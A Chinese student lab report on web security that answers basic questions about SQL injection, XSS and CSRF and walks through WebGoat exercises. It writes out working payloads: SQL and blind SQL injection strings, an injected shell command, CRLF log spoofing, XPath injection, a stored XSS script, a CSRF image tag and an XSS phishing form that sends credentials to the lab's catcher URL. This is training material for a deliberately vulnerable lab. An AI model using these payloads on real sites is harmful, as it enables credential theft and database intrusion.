Exp9 Web安全基础
一、基础问题
- SQL注入攻击原理,如何防御
- SQL注入漏洞是指在Web应用对后台数据库查询语句处理存在的安全漏洞。也就是,在输入字符串中嵌入SQL指令,在设计程序中忽略对可能构成攻击的特殊字符串的检查。后台数据库将其认作正常SQL指令后正常执行,可能实现对后台数据库进行各种操作,甚至造成破坏后台数据库等严重后果。
- SQL注入一般分为普通注入和盲注。
- 普通注入:后台数据库会回显有价值的提示信息,通过这些可能的报错信息可以更容易地进行注入,适合新手入门训练。
- 盲注:后台管理员在给出错误页面时,没有提供详细错误信息。攻击者需要运用脚本通过仅有的判断信息(比如时间差)对表中的每一个字段进行探测,从而实现注入。
- 防御:对输入的数据进行过滤,过滤掉敏感字符。加密数据库。
- XSS攻击的原理,如何防御
- 攻击者利用网站漏洞(通常这些漏洞是指网站后台处理程序没有很好的对用户输入进行过滤),输入可以显示在页面上的、对其他用户造成影响的HTML代码;由于受害者浏览器对目标服务器的信任,当其访问目标服务器上被注入恶意脚本的页面后,这段恶意脚本可以顺利执行,实现获取用户cookie并可以利用用户身份进行非法操作的目的。
- 浏览器自身可以识别简单的XSS攻击字符串,从而阻止简单的XSS攻击;从根本上说,解决办法是消除网站的XSS漏洞,这就需要网站开发者运用转义安全字符等手段。
- CSRF攻击原理,如何防御
- CSRF攻击的主要目的是让用户在不知情的情况下攻击自己已登录的一个系统,类似于钓鱼。如用户当前已经登录了邮箱,或bbs,同时用户又在使用另外一个,已经被你控制的站点,我们姑且叫它钓鱼网站。这个网站上面可能因为某个图片吸引你,你去点击一下,此时可能就会触发一个js的点击事件,构造一个bbs发帖的请求,去往你的bbs发帖,由于当前你的浏览器状态已经是登陆状态,所以session登陆cookie信息都会跟正常的请求一样,纯天然的利用当前的登陆状态,让用户在不知情的情况下,帮你发帖或干其他事情
- 通过 referer、token 或者 验证码 来检测用户提交。尽量不要在页面的链接中暴露用户隐私信息。对于用户修改删除等操作最好都使用post 操作
实践过程
1.开启webgoat
-
输入
java -jar webgoat-container-7.1-exec.jar
-
在浏览器输入
localhost:8080/WebGoat,进入webgoat
2.SQL字符串注入(String SQL Injection)
-
让我们试一试使用SQL注入,从而显示出所有信用卡号。可以先输入Smith试一试,发现出现在
SELECT * FROM user_data WHERE last_name = 'Smith'两个单引号中间,也就是我们可以通过控制在输入框中输入的字符串,达到控制select语句的目的。
-
输入
'or 1='1,语句就变成SELECT * FROM user_data WHERE last_name = ''or 1='1',这句的意思就是查询lastname='' OR(或者)1='1' ,这里的 1='1' 永远为真,所以成功通过。
3.日志欺骗(Log Spoofing)
- 利用日志的格式,使用换行等字符,欺骗管理员:Use CR (%0d) and LF (%0a) for a new line。
- 比如输入
lzm%0d%0aLogin Succeeded for username: admin
4.Numeric SQL Injection
- 题目大意是这个表单允许使用者看到天气数据,利用SQL注入使得可以看见所有数据
- 和之前的实验类似,只要加上一个1=1这种永真式即可达到我们的目的
- 使用
inspect Element对源代码进行修改,在任意一个值比如101旁边加上or 1=1;
- 成功结果
5.Command Injection
- 题目的要求是:尝试给操作系统注入命令行,要求能够在目标主机上执行系统命令
- 通过火狐浏览器的
inspect Element对源代码进行修改,右键点击BackDoors.help,,这样就可以直接定位到需要修改的位置,无需一行一行代码的查看了 - 例如在BackDoors.help旁边加上"& netstat -an & ipconfig"
- 点击view
- 后面跟着结果
6.Stage 1:String SQL Injection
-
题目要求使用字符串SQL注入在没有正确密码的情况下登录账号boss
-
用老套路,以用户Neville登录,在密码栏中输入' or 1=1 --进行SQL注入,发现登录失败
-
查看了一下网页源码,发现输入框对输入的字符长度进行了限制,最多只允许输入8个字符
-
对字符长度进行修改
-
重新登录,登录成功
7.XPATH Injection
- 题目要求是使用帐户Mik/Test123,目标是试着去查看其他员工的数据。
- 使用一个普通的用户名和密码,XPath会起作用,但是攻击者可能会发送一个坏用户名和密码,并在不知道用户名或密码的情况下,选择一个XML节点,如下所示:
Username: lzm' or 1=1 or 'a'='a
Password: lzm
8.Blind String SQL Injection
- 使用盲注进行爆破,在“Enter your Account Number”输入
101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='5213521352135213'), 1, 1) = 'h' ); - 根据返回的提示来判断name的范围,直至返回成功,然后把Jill输入表单,提交,如下图所示:
9.Phishing with XSS
- 这是跨站脚本钓鱼攻击,要求在搜索框中输入XSS攻击代码,利用XSS可以在已存在的页面中进一步添加元素的特点
- 在文本框里面输入一个钓鱼网站代码如下
</form>
<script>
function hack(){
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
</script>
<form name="phish">
<br>
<br>
<HR>
<H2>This feature requires account login:</H2>
<br>
<br>Enter Username:<br>
<input type="text" name="user">
<br>Enter Password:<br>
<input type="password" name = "pass">
<br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
- 在搜索框中输入攻击代码后点击搜索,会看到一个要求输入用户名密码的表单如下
- 输入用户名密码
- 点击登录,WebGoat会将输入的信息捕获并反馈回来,攻击成功
10.Stored XSS Attacks
- 要求创建非法的消息内容,可以导致其他用户访问时载入非预期的页面或内容
- 在Message中构造语句
<script>alert("5213 attack succeed!");</script>,提交后,可以发现刚刚创建的帖子20155213
11.Cross Site Request Forgery(CSRF)
- 写一个URL诱使其他用户点击,从而触发CSRF攻击,我们可以以图片的的形式将URL放进Message框,这时的URL对其他用户是不可见的,用户一旦点击图片,就会触发一个CSRF事件
- 在message框中输入
<img src="http://localhost:8080/WebGoat/attack?
Screen=288&menu=900&transferFunds=5213"/>
-
提交后在下面的Message List里面可以看我刚刚发送的消息
-
点击该消息,当前页面就会下载这个消息并显示出来,转走用户的5213元,从而达到CSRF攻击的目的
实验总结
这次实验确实学到了很多东西,原来还有这么个集成攻击小东西,练习中对xss,sql注入有了进一步认识,就先做10个吧。